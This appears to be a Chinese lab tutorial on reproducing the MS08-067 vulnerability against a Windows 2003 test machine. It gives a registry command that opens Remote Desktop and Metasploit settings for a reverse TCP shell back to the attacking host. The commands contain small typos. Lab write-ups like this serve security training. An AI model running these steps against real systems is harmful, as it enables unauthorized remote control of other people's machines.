zoukankan      html  css  js  c++  java
  • 渗透测试中期--漏洞复现网络服务渗透攻击--MS08_067

    靶机:Win2k3    10.10.10.130

    攻击机:BT5      10.10.10.128

    一:nmap 查看WinK3是否开放端口3389

      

     开放3389方法:我的电脑->属性->远程

      

       命令行方式开启3389端口(任意端口):

    reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:WINDOWSsystem323389.bat && call 3389.bat

    二、攻击阶段

      1、查找ms08_067漏洞模块

       

       2、调用08_067_netapi渗透模块

     

       3、查看此渗透模块所对应的攻击载荷

     

       4、查看设置参数并进行设置所需要的参数

      

    set payloads generic/shell_reverse_tcp  #设置所需模块
    
    set options #查看模块所需的设置的参数

      

    set RHOST 10.10.10.130 #设置目标主机
    set LRHOST 10.10.10.128 #设置本机
    set LPORT 5000  #设置攻击机与靶机连接的端口
    show targets 
    set target 7  #通过show targets 可以查看漏洞所支持windows版本,并设置目标主机所对应的版本序号

     

     5、开始攻击

      

     可以看到已经在win2k3的C盘目录下了

        

  • 相关阅读:
    将博客搬至CSDN
    smarty不渲染html页面
    开篇
    html的入门——从标签开始(1)
    java内部编码
    用base64Encoder进行编码 和base64Decoder解码
    序列化和反序列化
    HttpServletResponse类
    配置Tomcat服务器数据连接池
    SVN修改地址
  • 原文地址:https://www.cnblogs.com/white-the-Alan/p/14318478.html
Copyright © 2011-2022 走看看